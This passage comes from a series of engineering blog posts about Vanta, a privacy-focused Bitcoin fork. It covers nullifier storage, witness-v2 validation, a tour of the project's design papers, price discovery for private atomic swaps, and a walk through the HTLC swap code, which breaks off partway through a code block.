### Operator simplicity A node operator running `vantad` doesn't need to also run wallet software, doesn't need to trust an indexer, doesn't need to subscribe to a third-party "nullifier feed." The chain validates itself. This is the same reason most exchanges run their own Bitcoin nodes instead of trusting Blockchain.info: chainstate is the source of truth. ### Wallet flexibility If the chain owns nullifier-uniqueness, wallets become *commodity software.* You can have ten different wallets, three different proof systems, an iOS-native client, a CLI, a hardware-wallet integration — and they all rely on the same chainstate validation. The wallet's job collapses to "construct a valid spending transaction." The chain is the arbiter. ## What it costs Nothing is free. Three real costs: ### Storage Every nullifier ever revealed has to live in chainstate forever. With Poseidon-2 over BN254 the digest is 32 bytes. Vanta is a 1-minute-block chain with 100k VANTA per block; assume a long-term steady state of, say, 5 nullifiers per block (transparent transactions don't burn nullifiers; only shielded spends do). At ~525,600 blocks per year, that's `5 × 525600 × 32 = ~84 MB` of nullifier state per year. After ten years: ~840 MB. Compare to Bitcoin's UTXO set, which is currently ~12 GB. We're well below it. Storage is not the limiting factor. ### Sync time A new node has to download and verify the nullifier history. The verification cost is just a hash check per nullifier (no proof re-verification needed if the block was already validated by the network — the witness root in the coinbase commits to the SMT). At a few microseconds per hash, the hash checks for ten years of history (~26M nullifiers) take a couple of minutes on a modern CPU; it's the SMT maintenance below that actually dominates a full resync. Acceptable. ### Sparse-Merkle-tree maintenance This is the real cost. We commit to the *root* of the nullifier set in every coinbase, so that light clients and SPV-style verifiers don't need the full chainstate to verify a proof.
Maintaining an SMT over a growing set of 32-byte hashes is non-trivial. We use the [`smirk` Rust crate](https://crates.io/crates/smirk) (an SMT library written for exactly this kind of consensus-state use case) and the marginal cost per insert is `O(log n)` hashes — a few hundred microseconds in practice. The implementation lives in [`vanta/` (the Rust subtree)](https://github.com/Dax911/vanta/tree/main/vanta) and the binding into the C++ core happens in `src/validation.cpp` via FFI. **TODO: Dax confirm exact SMT crate name** — `smirk` is what we use today; if we switched to a custom implementation note that here. ## The witness-v2 dance Here's the part that took me longest to get comfortable with. Bitcoin's witness data (segwit) is verified after the script. We needed the ZK proof to be verified after the script too — the script confirms the spender knows the right commitment, the proof confirms the spend is valid under the rules of the shielded pool. Vanta extends segwit to a "witness v2" format that includes: 1. The classic script witness (signatures, etc.). 2. A new `proof_root` field — a 32-byte commitment to the proof's public inputs. 3. A new `nullifier` field — the 32-byte nullifier the spend is consuming. The C++ validator does three checks in order: 1. The script verifies (standard segwit path). 2. The `nullifier` is not already in the chainstate nullifier set. 3. The `proof_root` matches the in-block coinbase's SMT root for this transaction's logical position. The actual ZK proof verification happens **out of process** in the Rust sidecar. The C++ node fires off the proof to a local Unix socket and waits for `ok` or `not ok`. This sounds slow but in practice the prover-side work is what's expensive (4-8 seconds); the verifier-side check is ~30 milliseconds and well-amortised across the block. If the sidecar is unavailable, the node refuses to validate witness-v2 transactions and stays in IBD-style "I'm not caught up" mode. 
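The three-check order can be sketched as code. All names below are hypothetical, and the per-position SMT lookup is simplified to a direct root comparison — the real checks live in `src/validation.cpp`, with the proof verified out of process:

```rust
use std::collections::HashSet;

// Sketch of witness-v2 validation order. Hypothetical types; the real
// proof verification happens in the Rust sidecar over a Unix socket.
struct WitnessV2 {
    nullifier: [u8; 32],
    proof_root: [u8; 32],
}

#[derive(Debug, PartialEq)]
enum Reject {
    BadScript,
    DoubleSpend,
    ProofRootMismatch,
    SidecarDown,
}

fn validate_witness_v2(
    script_ok: bool, // check 1: the standard segwit script path
    chainstate_nullifiers: &HashSet<[u8; 32]>,
    coinbase_smt_root: [u8; 32],
    sidecar_up: bool,
    w: &WitnessV2,
) -> Result<(), Reject> {
    if !script_ok {
        return Err(Reject::BadScript);
    }
    // Check 2: the nullifier must not already be in chainstate.
    if chainstate_nullifiers.contains(&w.nullifier) {
        return Err(Reject::DoubleSpend);
    }
    // Check 3: proof_root must match the coinbase SMT commitment
    // (simplified here to direct equality).
    if w.proof_root != coinbase_smt_root {
        return Err(Reject::ProofRootMismatch);
    }
    // The ZK proof itself is verified by the sidecar; if it's down we
    // refuse rather than accept an unverified shielded spend.
    if !sidecar_up {
        return Err(Reject::SidecarDown);
    }
    Ok(())
}

fn main() {
    let state: HashSet<[u8; 32]> = HashSet::new();
    let w = WitnessV2 { nullifier: [7; 32], proof_root: [9; 32] };
    assert_eq!(validate_witness_v2(true, &state, [9; 32], true, &w), Ok(()));
    assert_eq!(
        validate_witness_v2(true, &state, [0; 32], true, &w),
        Err(Reject::ProofRootMismatch)
    );
    assert_eq!(
        validate_witness_v2(true, &state, [9; 32], false, &w),
        Err(Reject::SidecarDown)
    );
    println!("witness-v2 check order enforced");
}
```

The real check 3 looks up the SMT leaf for the transaction's logical position rather than comparing roots directly.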
Better than silently accepting unverified shielded spends. ## What I changed my mind about I started this design wanting to put proof verification *inside* the C++ validator via a precompile-style C++ binding. That would have meant linking the entire `risc0-zkvm` Rust crate into Bitcoin Core's C++ build, which is — to put it mildly — not a small ask of a Bitcoin Core review process. The out-of-process sidecar pattern was a concession to "we will eventually want to upstream as much of this as possible." A node that talks to a sidecar over a Unix socket is a node that can be ported to the eventual full-Rust rewrite without changing its consensus contract. The sidecar is the ABI; the language behind it can move. I'm still not 100% sold on this trade. The audit surface is a lot bigger when there are two processes. **TODO: Dax confirm whether we end up upstreaming the proof verifier into the core process for v2.** ## Further reading - [`Dax911/vanta`](https://github.com/Dax911/vanta) — the chain - [`vanta/` Rust subtree](https://github.com/Dax911/vanta/tree/main/vanta) — the ZK sidecar - [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the parent post - [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — the SDK-side primitive - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — what the commitments commit to - Hopwood, Bowe, Hornby, Wilcox — *Zcash Protocol Specification* (2022 edition) - Buterin et al. — [*Sparse Merkle Trees*](https://eprint.iacr.org/2016/683) --- # What's in vanta/papers — reading 17 design docs in 2026 Canonical: https://blog.skill-issue.dev/blog/vanta_papers_design_doc_tour/ Description: Vanta ships its whitepaper as 17 markdown files in the repo, not a PDF on a marketing page. This is the tour: what each doc covers, which one has the wording bug, and why the docs live next to the code. 
Published: 2026-04-14T19:50:56.000Z Tags: vanta, documentation, whitepaper, design A privacy chain in 2026 cannot ship as a one-page marketing site with a PDF link. The serious audience — auditors, exchanges, regulators, other engineers — needs to read the design without filling out a form. So Vanta's whitepaper isn't a PDF on a website. It's a directory: [`papers/`](https://github.com/Dax911/vanta/tree/main/papers) in the main repo, 17 markdown files, MIT-licensed, version-controlled, diffable. This post is a tour. One paragraph per doc, plus the planning notes that aren't in `papers/` but are in [`planning/`](https://github.com/Dax911/vanta/tree/main/planning). At the end I call out the wording bug the audit flagged but I haven't fixed yet. ## Why design docs in the repo Three reasons. **Diffability.** A change to the chain rules is a commit. The doc that explains the rule change is also a commit. Over time the doc diff and the code diff are in the same git history, so you can check whether the prose ever lagged the code. **No marketing intermediary.** A PDF on a website goes through whoever owns the website. A markdown file in the repo is *the* artefact; nobody can mis-summarize it without me noticing. This matters more than I expected when the audience for the docs is "people who will run nodes" rather than "people who will buy the token." **They're the input to the LLMs that read the codebase.** Increasingly, technical evaluation in 2026 is mediated by AI assistants reading the repo. Markdown in the repo is what those tools index. PDF on a website is not. **TODO: Dax confirm this is still our framing once the docs/ ship has matured.** ## The 17 papers `00-master.md` — index of everything else. If you only read one, this is the one to *not* read; jump to `01`. `01-executive-summary.md` — the headline pitch in long form. 
The opening line is the design: *"Vanta Protocol is the first sovereign Layer 1 blockchain where financial privacy is enforced by consensus on every non-coinbase transaction."* The interesting bits: the explicit refusal of Zcash-style optional shielding, the rule name `bad-vanta-v2-output-nonzero-value` that fires on any v2 output with non-zero `nValue`, the "fast privacy decay" coinbase pattern (one confirmation transparent, private after). `02-technical-whitepaper.md` — the deep dive. Witness v2 layout, the `VantaJournal` struct, the `value_balance` semantics (>0 burns hidden value to L1, <0 mints it from L1, =0 is a pure shielded transfer). The arithmetic of the consensus rule. This is the paper an auditor reads. `03-comparative-technical-analysis.md` — Vanta vs Zcash, vs Monero, vs Penumbra, vs CoinJoin-on-Bitcoin. Honest about where each peer is ahead and where each is behind. Calls out that Penumbra is on the wrong chain base (Cosmos SDK + Tendermint BFT) for our specific bet on PoW. `04-market-analysis.md` — TAM and competitive positioning. Not technical, but useful for understanding the framing. **TODO: Dax confirm the market sizing before I quote it elsewhere.** `05-layer-taxonomy.md` — the taxonomy of L1 / L2 / sidechain / app-layer privacy and where Vanta sits. Most useful for readers who have already absorbed Penumbra, Zcash, Tornado Cash, and want to triangulate. `06-pitch-deck.md` — the slides version. Repeats the executive summary at lower resolution. `07-business-plan.md` — operations, deployment, infra. Mostly internal but in the open repo because there's nothing actually private in a fair-launch chain's business plan. `08-tokenomics.md` — the supply schedule, halvings, fair launch. The numbers are the ones in the [original L1 post](/blog/vanta_zk_privacy_l1/): 100k VANTA per block, 42B total supply, 210k-block halving (~146 days). Zero premine, zero founders allocation. 
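The supply numbers check out under a Bitcoin-style integer halving schedule. A quick sketch — hypothetical code in whole-VANTA units, not the chain's actual subsidy function:

```rust
// Sanity-check the 08-tokenomics numbers. Geometric series:
// 100_000 × 210_000 × (1 + 1/2 + 1/4 + …) → 42B in the limit.
// Integer halving lands slightly under, exactly as Bitcoin's "21M"
// is really 20,999,999.97… BTC.
fn total_supply(initial_subsidy: u64, halving_interval: u64) -> u64 {
    let mut total = 0u64;
    let mut subsidy = initial_subsidy;
    while subsidy > 0 {
        total += subsidy * halving_interval;
        subsidy /= 2; // Bitcoin-style integer halving
    }
    total
}

fn main() {
    let supply = total_supply(100_000, 210_000);
    // Just under the headline 42B figure, per the integer division.
    assert!(supply <= 42_000_000_000 && supply > 41_990_000_000);
    println!("asymptotic supply: {} VANTA", supply);

    // 210,000 one-minute blocks between halvings:
    let days = 210_000.0 / (60.0 * 24.0);
    println!("halving every ~{:.1} days", days);
}
```

A real implementation would track base units (satoshi-style) rather than whole VANTA, but the schedule arithmetic is identical.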
**TODO: Dax confirm we're not making any forward statements about $VANTA price or fundraising; I have *not* read these tokenomics with that lens and I won't quote any forward-looking number.** `09-performance-analysis.md` — block-time, propagation, proof-time benchmarks. Prover takes 30–60s on CPU, verifier ~30ms. Block validation overhead is the verifier cost amortised across block transactions. Acceptable for 1-minute blocks. `10-novelty-analysis.md` — what's new vs prior art. The honest version: very little is new at the *primitive* level (Pedersen commitments, nullifiers, SMTs, all known); the synthesis (mandatory privacy + Bitcoin Core fork + SP1 backend + AuxPoW path) is the contribution. `11-paradigm-research.md` — the broader research positioning. Reads as a literature review. Useful if you want to know where the design borrows ideas from (Zcash, Penumbra, Aleo) and where it deliberately diverges. `12-academic-paper.md` — the conference-paper version. Same content as `02`, formatted to academic conventions. The version we'd submit to a privacy-coin venue if we were doing that. `13-security-model.md` — what the chain protects against, what it doesn't. The "what it doesn't" list is the important part: targeted timing attacks on a single transaction, side-channel leakage through wallet behaviour, an adversary with control of the proof-network if the user uses one. Read this before you build on top. `14-public-roadmap.md` — what's shipped, what's coming. Phase 1/2 complete, Phase 3 in progress (L2 privacy layer with iroh gossip), Phase 4 future (full Rust node rewrite). The dates are deliberate ranges, not commitments. `15-regulatory-framework.md` — how the chain reads to a regulator. **TODO: Dax confirm before I quote any specific position; I am not a lawyer and the regulatory narrative belongs to the legal review, not to me writing a blog post.** `16-use-cases.md` — what people will actually do with the chain. 
Treasury operations, individual savings, atomic-swap liquidity. Honest about which use cases need *more than* mandatory privacy (e.g. payroll, where the recipient set has to be opaque too — that's a wallet UX problem, not a chain problem). `17-zkvm-engineering.md` — the deep dive on SP1, Plonky3, why we picked them, the abstraction layer that makes zkVMs swappable. I cited this paper extensively in [Why we shipped SP1 instead of RISC Zero](/blog/vanta_sp1_zkvm_circuits/). It's the most useful paper for an engineer evaluating Vanta against another zkVM-based chain. ## The planning notes [`planning/`](https://github.com/Dax911/vanta/tree/main/planning) is *not* in `papers/`. It's the loose work-in-progress notes I'm not ready to call canonical. Today there's one file: [`price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md). That doc is worth a separate post, which I wrote: [Private atomic swaps and the price-discovery problem](/blog/vanta_private_atomic_swaps/). The short version: if either side of an atomic swap is shielded, the rate `btc_amount / vanta_amount` is hidden from observers, which means no public price tape, which means no spot market formation. The doc walks through six options for how price could emerge without compromising the privacy property — voluntary post-trade rate publication, ZK-attested rate proofs, off-chain encrypted order books — and lands on a hybrid recommendation. I'm holding it in `planning/` rather than `papers/` because it's a *design exploration*, not a commitment. The status line at the top says exactly that: "Status: Design exploration, not a commitment. Written 2026-04-17." 
## The wording bug I haven't fixed The repo's [`CLAUDE.md`](https://github.com/Dax911/vanta/blob/main/CLAUDE.md) flags an inconsistency I'm aware of: > Phase 2 papers wording is "code complete, activation pending" but code shows `ALWAYS_ACTIVE` from genesis — wording bug in `papers/01-executive-summary.md` to fix. The executive summary in `01-executive-summary.md` describes some of the privacy rules as "code complete, activation pending." The actual chain has those rules `ALWAYS_ACTIVE` from genesis — they're enforced from block 1, not gated behind a future activation. The doc lags the code. This is the kind of thing that *only* happens when you're rewriting both fast. The fix is a five-minute paragraph edit; I'm calling it out here because the right way to handle a doc-vs-code drift is to say "yep, doc lags, here's the fix" rather than to silently update and hope nobody noticed. **TODO: Dax confirm timing on shipping that fix.** ## Why the docs are the README's older sibling A reader who only reads the [README.md](https://github.com/Dax911/vanta/blob/main/README.md) gets the chain parameters and a roadmap. A reader who reads `papers/` gets the *case* for the chain — why these parameters, why this proof system, why mandatory privacy, why fair launch. The README is for someone who's deciding whether to spend an hour. The papers are for someone who's deciding whether to run a node, port a wallet, list the asset, write a regulatory memo, or audit the cryptography. Different audiences, different artefacts. Both live in the repo. Both are diffable. Both are MIT-licensed. That's the documentation discipline I'm trying to lock in: nothing about how the chain works lives behind a marketing page or a sales rep. 
## Further reading - [`papers/`](https://github.com/Dax911/vanta/tree/main/papers) — the 17 markdown files - [`papers/00-master.md`](https://github.com/Dax911/vanta/blob/main/papers/00-master.md) — the index - [`papers/01-executive-summary.md`](https://github.com/Dax911/vanta/blob/main/papers/01-executive-summary.md) — the headline pitch - [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) — the SP1/Plonky3 deep dive - [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md) — the swap-price design exploration - [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the practitioner-flavored pitch - [Why we shipped SP1 instead of RISC Zero](/blog/vanta_sp1_zkvm_circuits/) — the post that quotes paper 17 most --- # Private atomic swaps and the price-discovery problem Canonical: https://blog.skill-issue.dev/blog/vanta_private_atomic_swaps/ Description: BTC ↔ VANTA atomic swaps via HTLC are the easy part. If the VANTA leg is shielded, no observer can compute the rate, and no rate means no public price. Walking through six designs and the hybrid recommendation in vanta/planning. Published: 2026-04-17T05:52:57.000Z Tags: vanta, atomic-swaps, htlc, price-discovery, planning The 2026-04-17 commit message — `planning: price-discovery design for private atomic swaps` — is one of the more interesting things in the Vanta repo, because it isn't code. It's a design exploration in [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md), and it's the kind of doc I wish more chains shipped: a problem statement, six options, an honest comparison, a recommendation, and an explicit *"this is not a commitment"* status flag. This post walks through the design. 
The HTLC machinery on the implementation side lives in [`vanta/vanta-swap`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-swap); the policy question is in `planning/`. ## What atomic swaps are, briefly A hash-time-locked contract (HTLC) lets two parties on different chains agree to a swap without trusting each other or a third party. Alice has BTC, Bob has VANTA. They agree to swap. Alice picks a random secret `s`, computes `h = sha256(s)`. They both lock their funds in HTLCs that pay out to *whoever knows `s`* (and refund to the original sender after a timeout, if `s` never gets revealed). The script for the HTLC is short — this is the shape of the script built in [`vanta/vanta-swap/src/htlc.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs), with the data pushes shown as `<placeholders>`:

```
OP_IF
  OP_SHA256 <h> OP_EQUALVERIFY <claim_pubkey> OP_CHECKSIG
OP_ELSE
  <timeout> OP_CHECKLOCKTIMEVERIFY OP_DROP <refund_pubkey> OP_CHECKSIG
OP_ENDIF
```

The `IF` branch is "claim with the preimage." The `ELSE` branch is "refund after the timelock." Both are P2WSH-wrapped. The receiver claims by revealing `s` to spend the HTLC; once `s` is on-chain, the other side claims their HTLC using the same `s`. If either side bails, both refund after the timeout. Same `h` on both chains. Same `OP_SHA256`. Both Bitcoin and Vanta speak this script unchanged. That's why the swap implementation in [`vanta/vanta-swap/src/swap.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs) works against both chains' RPCs with a single `ChainConfig` abstraction. ## The price-discovery problem The swap implementation today is *fully transparent on both sides*. From the planning doc:

> Worth being precise: **the current swap implementation is fully transparent on both sides.**
>
> - `swap.rs` funds the VANTA leg via L1 RPC (`createrawtransaction` → `fundrawtransaction` → `signrawtransactionwithwallet` → `sendrawtransaction`). That's the transparent L1, not the shielded L2.
> - So `vanta_amount` is plainly visible in the P2WSH output on L1.
> - `btc_amount` is visible on Bitcoin. > - Price is therefore **already discoverable today** by anyone scanning matched hashes across the two chains. So the problem is *forward-looking*. Once the VANTA leg moves to a shielded note (commitment + encrypted amount, no visible value on L1), an external observer can: - find the BTC-side HTLC with amount `X` and embedded hash `h` - see *that* a note with commitment tied to `h` exists on VANTA L2, but not its amount `Y` - without `Y`, no `X/Y` rate No rate means no tape. No tape means no public order book. No public order book means no efficient price formation. *That* is the problem. I want to push back on a knee-jerk response that "privacy chains shouldn't have public prices." Of course they should — every market needs a price. The question is *how price emerges without compromising the privacy property*. That's not the same as "should there be a price at all," which is a question I think privacy maximalists sometimes confuse. ## Six options The doc walks through six designs. I'll abbreviate. ### 1. Do nothing — OTC negotiation only Peers find each other on Nostr / Telegram / a forum, agree privately, swap. Zero engineering. Zero price discovery. Hard to bootstrap a market. New users can't tell what a fair rate is. LPs won't come. Pros: trivial, full privacy. Cons: the market doesn't form. ### 2. Voluntary post-trade rate publication After a swap, either party signs a `{rate, timestamp}` statement and posts it to a relay (Nostr, an HTTP aggregator, whatever). An aggregator computes a median or time-bucketed mean. **Crucially: publish the rate, not the size.** Rate is a scalar; it leaks nothing about how much the signer actually traded. Pros: simple, opt-in, amounts stay shielded. Cons: self-reported, trivially fakeable. Anti-spam needs a cost function — proof of recent swap, a small VANTA burn, a reputation-weighted signer set. ### 3. 
ZK-attested rate proofs Use SP1 (already in the consensus stack) to prove: > "I participated in a swap whose hash is `H` (publicly known), and the rate was in `[r − ε, r + ε]`, without revealing either amount." The circuit takes `X`, `Y`, `r` as private witness, publishes `H` and `r` as public output. Anyone can verify the SP1 proof and see a rate without seeing amounts. Pros: cryptographically binding, not self-reported. Cons: non-trivial circuit work; SP1 proof costs (the doc notes the 5070 box is below the 24 GB GPU minimum, so we'd need CPU proving or a remote prover); UX friction. ### 4. Off-chain encrypted order book with HTLC settlement Bisq-style. Orders live in a P2P relay (Tor hidden service, Nostr, Waku). Orders are plaintext (amount, rate, counterparty pubkey) at *posting* time. Match happens, counterparties swap via HTLC, order disappears. Price discovery is from the *order book*, not from chain history. Pros: decouples price discovery (pre-trade order book) from settlement privacy (post-trade on-chain). The doc calls this "arguably the right architecture." Cons: requires a relay layer; orders-in-the-open weakens pre-trade privacy of unfilled orders. ### 5. Trusted LP / market maker Professional MMs run their own nodes, quote two-sided publicly, users trade against them via atomic swap. LPs willingly reveal quotes because that's their business. Pros: realistic bootstrapping path, CEXes already work this way. Cons: centralises price discovery; LPs need KYC/operational reality → potentially a regulatory attack surface. ### 6. Hybrid: opt-in transparent-swap mode Users opt into a "transparent swap" that pins the VANTA leg to L1 (visible). Those swaps contribute to a public price tape. Private traders settle on L2 and free-ride on the tape. Pros: zero new crypto; user-level privacy/contribution choice. Cons: tragedy-of-the-commons. Everyone wants privacy, nobody wants to be the transparent swapper. 
Requires incentive design (fee rebates for transparent swappers?). ## The recommendation The doc lands on a hybrid of #4 and #2: > For a near-term path: **combine #4 (off-chain order book) + #2 (voluntary rate publication)**. Rationale: > > - #4 gives us an actual market — users see bids/asks before committing. > - #2 gives us a historical tape — aggregators compile published rates into OHLC candles. > - Both respect the privacy invariant: amounts stay shielded. > - Both are boring engineering, not new cryptography. We can ship them. > - #3 (ZK rate proofs) is a "do it later if spam becomes a real problem" lever. I agree with this and want to underscore the framing: *boring engineering, not new cryptography*. New cryptography is expensive in the medium term — it has to be audited, the implementation has to land, the wallets have to integrate, the tooling has to mature. An off-chain order book + voluntary rate posts ship in a quarter using existing primitives. The ZK rate-proof option is a clean lever to pull *later*, if the simpler scheme proves insufficient against spam. Worth a moment on #3 specifically. ZK rate proofs are tempting because they're cool. They're also a chunk of circuit work, and the wallet UX gets one more "generate proof" wait. Building it before we know whether voluntary publication produces enough useful data is over-engineering. The principle: **build the simplest thing that could work, instrument it, then add cryptography when the simpler thing demonstrably fails.** ## Open questions the doc flags The planning note ends with five questions I haven't answered yet: 1. **Anti-spam for voluntary publication.** Cost function: proof of recent shielded spend? Small VANTA burn? Reputation-weighted signer? My current bias is "small VANTA burn weighted by chain age" — cheap to publish if you've held VANTA for a while, expensive if you haven't, no operational dependency on a reputation graph. 2. 
**Relay topology.** Nostr (easy, public), Waku, or a Tor hidden-service relay? Probably Nostr to start. **TODO: Dax confirm we want Nostr-first vs a custom relay.**
3. **Quote units.** sats/VANTA or VANTA/BTC? Pick one canonical representation up front and stick it in the whitepaper suite. I lean sats/VANTA because it makes for round numbers at current valuation.
4. **Handling the current transparent swap.** Migration path or permanent second mode? Affects whether the price-discovery design has to handle two worlds. **TODO: Dax confirm.**
5. **Cross-asset routing.** VANTA ↔ X ↔ BTC via multi-hop. Out of scope here, but on the longer-term roadmap.

These are the kinds of open questions that *should* be public. A privacy chain whose policy decisions are made behind closed doors is, sociologically, a chain you can't trust. Putting the design exploration in the open repo means the discussion happens in pull requests, not in a Slack I run.

## What's *not* in this design

A couple of things I want to flag explicitly because they often come up.

**Oracles.** Vanta does not currently feed external prices into on-chain logic. There's no smart-contract platform, so there's no place to feed them *to*. Oracles are an L2 problem; they'll show up if and when programmable shielded contracts ship.

**Loans / derivatives.** Out of scope. Spot atomic swaps are the spot market. DeFi primitives beyond spot are a much larger conversation.

**A unified DEX.** I am skeptical of "one app to rule them all" DEX designs for a privacy chain. Composability is harder when amounts are shielded; the simplest path is probably *multiple* small-surface protocols (atomic swaps for cross-chain, order book for in-chain, AMM only if liquidity demands it).

## What changed my mind about the swap problem

Two things. First, when I started thinking about this, I assumed ZK rate proofs (option 3) were the obvious answer because they're the most cryptographically clean.
They're also the most cryptographically *expensive*. Once I actually thought about the user flow — generate a swap, generate a proof, *then* publish — I realised the friction would crater participation. The voluntary scheme is worse on cryptographic strength but enormously better on participation, and a market with weaker price proofs that more people use is a better market than a strong-proof market that nobody uses.

Second, I underestimated how much of the answer is *just an order book*. Bisq's design has been working for years on exactly this problem (privacy-respecting BTC ↔ fiat). An off-chain encrypted order book with on-chain HTLC settlement is the architecture that *already works* in the wild for a closely-related problem. Reusing it for VANTA ↔ BTC is the smallest delta.

Both of these updates landed *because the planning doc was a pull-out-the-options doc*, not a "here's the design" doc. Writing it forced the comparison.

## Further reading

- [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md) — the doc this post walks through
- [`vanta/vanta-swap`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-swap) — the HTLC implementation
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain
- [What's in vanta/papers](/blog/vanta_papers_design_doc_tour/) — the canonical-papers tour
- [Bisq's design overview](https://bisq.network/) — the existing implementation of "encrypted order book + on-chain settlement"
- [BIP 199 (HTLC)](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki) — the upstream pattern the swap script implements

---

# BIP-199 by hand: a code walk through vanta-swap

Canonical: https://blog.skill-issue.dev/blog/vanta_swap_htlc_walkthrough/
Description: A line-by-line tour of the Rust HTLC state machine that drives BTC ↔ VANTA atomic swaps.
Redeem script bytes, the 2x/1x timelock dance, BIP143 sighash binding, and the witness layout that makes refund and claim routes provably distinct.
Published: 2026-04-13T22:22:23.000Z
Tags: vanta, atomic-swaps, htlc, bitcoin, bip-199, rust

import { Mermaid, RustPlayground, TradeoffTable, Aside } from "@/components/mdx";

The companion to [Private atomic swaps and the price-discovery problem](/blog/vanta_private_atomic_swaps/) is a piece of code, not a planning document. The chain-policy decisions about *how prices form* live upstream in [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md). The actual swap mechanics — the bytes that go on the wire, the script that locks the funds, the witness that unlocks them — live in [`vanta/vanta-swap`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-swap), which landed in commit [`149c1a41`](https://github.com/Dax911/vanta/commit/149c1a419) on 2026-04-13.

This post is a code walk. If you want the policy framing, read the other post first. If you want to understand what an HTLC actually *is* in 350 lines of Rust, you're in the right place.

## What [BIP-199](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki) is, in one paragraph

A hash time-locked contract is a Bitcoin output that pays whoever can produce one of two things:

1. The preimage of a public hash (the *claim* path), or
2. The original funder's signature, but only after a block-height locktime has passed (the *refund* path).

That's a four-line redeem script. The protocol around it — generating the secret, picking timelocks, broadcasting in the right order, watching the chain for the preimage reveal — is the [BIP-199 atomic-swap state machine](https://github.com/bitcoin/bips/blob/master/bip-0199.mediawiki). Two parties construct two HTLCs, one on each chain, with the *same* hash and *asymmetric* timelocks. Either both legs settle or both legs refund.
There is no third outcome.

## The timelock math

The whole thing rests on a piece of arithmetic that is one inequality:

$$
t_{\text{now}} < t_{1} < t_{2}
$$

where $t_2$ is the initiator's locktime (longer) and $t_1$ is the participant's locktime (shorter, conventionally $t_1 = t_2 / 2$).

The initiator commits *first*, with the longer timelock. The participant matches with a shorter timelock. When the initiator claims the participant's HTLC (revealing the preimage), the participant has at least $t_1$ left to use that preimage on the initiator's HTLC. If the participant disappears, the initiator waits $t_2$ blocks and refunds. If the initiator disappears, the participant waits $t_1$ and refunds.

The asymmetry matters. If the timelocks were equal, a malicious initiator could refund their own HTLC seconds before the participant claims, racing the participant for the funds. The 2x/1x ratio gives the participant a $t_1$-block buffer to react to the preimage reveal.

In Vanta's CLI this shows up as a `--timelock` flag on `initiate` and a derived value the participant uses, printed as a hint by [`main.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/main.rs):

```
The participant should use timelock = {timelock / 2} (half of yours).
```

Half. Not "your locktime minus epsilon." Half. Because the participant has to pick a value that gives the initiator enough time to claim *and* leaves the participant a meaningful refund window if the initiator vanishes.

## The state machine

Two parties, four states.
<Mermaid chart={`stateDiagram-v2
    Created: initiator generates secret + hash
    Created --> Funded_I: initiator broadcasts HTLC on chain A (locktime t2)
    Funded_I --> Funded_P: participant broadcasts HTLC on chain B (locktime t1)
    Funded_P --> Claimed_P: initiator reveals preimage, claims chain B
    Claimed_P --> Claimed_I: participant uses revealed preimage on chain A
    Claimed_I --> [*]: swap complete
    Funded_I --> Refunded_I: t2 expired, no participant
    Funded_P --> Refunded_P: t1 expired, initiator never claimed
    Refunded_I --> [*]: aborted before participant
    Refunded_P --> [*]: aborted after participant`}/>

The two refund paths are the *only* way the swap fails — and a refund is never partial. Either both sides claim — atomic — or both sides refund — atomic. The mid-swap state where exactly one side has settled is unreachable, because the act of claiming chain B *publishes* the preimage on chain B, and chain A's HTLC reads the same preimage. (We'll come back to this.)

The Rust enum that mirrors this is in [`swap.rs:48`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs):

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub enum SwapStatus {
    Created,
    Funded,
    Claimed,
    Refunded,
}
```

Note: there's no `Aborted` or `Failed`. A swap that goes wrong refunds. There is no sad-path state.

## The redeem script, byte by byte

Quoting [`htlc.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs):

```
OP_IF
    OP_SHA256 <hash> OP_EQUALVERIFY
    <receiver_pubkey> OP_CHECKSIG
OP_ELSE
    <locktime> OP_CHECKLOCKTIMEVERIFY OP_DROP
    <sender_pubkey> OP_CHECKSIG
OP_ENDIF
```

The `IF` branch is the *claim* path. To take it, the spender pushes:

1. A signature over the spending transaction
2. A 32-byte preimage
3. `0x01` (OP_TRUE — selects the IF branch)
4. The redeem script itself (this is the P2WSH witness convention)

The script then runs: pop `0x01` (truthy → enter IF), `OP_SHA256` the preimage, compare against the embedded `<hash>` with `OP_EQUALVERIFY` (fail if not equal), then `<receiver_pubkey> OP_CHECKSIG` against the signature.
The `ELSE` branch is the *refund* path:

1. A signature
2. The empty byte string (OP_FALSE — selects the ELSE branch)
3. The redeem script

`<locktime> OP_CHECKLOCKTIMEVERIFY OP_DROP` is the BIP-65 incantation: pull `nLockTime` from the spending tx, compare against `<locktime>`, fail if too early. Then `<sender_pubkey> OP_CHECKSIG`.

The Rust that builds this lives in `redeem_script(&self) -> Vec<u8>`. It hand-emits opcodes. Worth quoting — there's no "script library" here, just a `Vec<u8>` that gets pushed on:

<RustPlayground code={`// Simplified excerpt from vanta-swap/src/htlc.rs.
// Hand-emitted Bitcoin script — no abstraction layer.
mod op {
    pub const OP_IF: u8 = 0x63;
    pub const OP_ELSE: u8 = 0x67;
    pub const OP_ENDIF: u8 = 0x68;
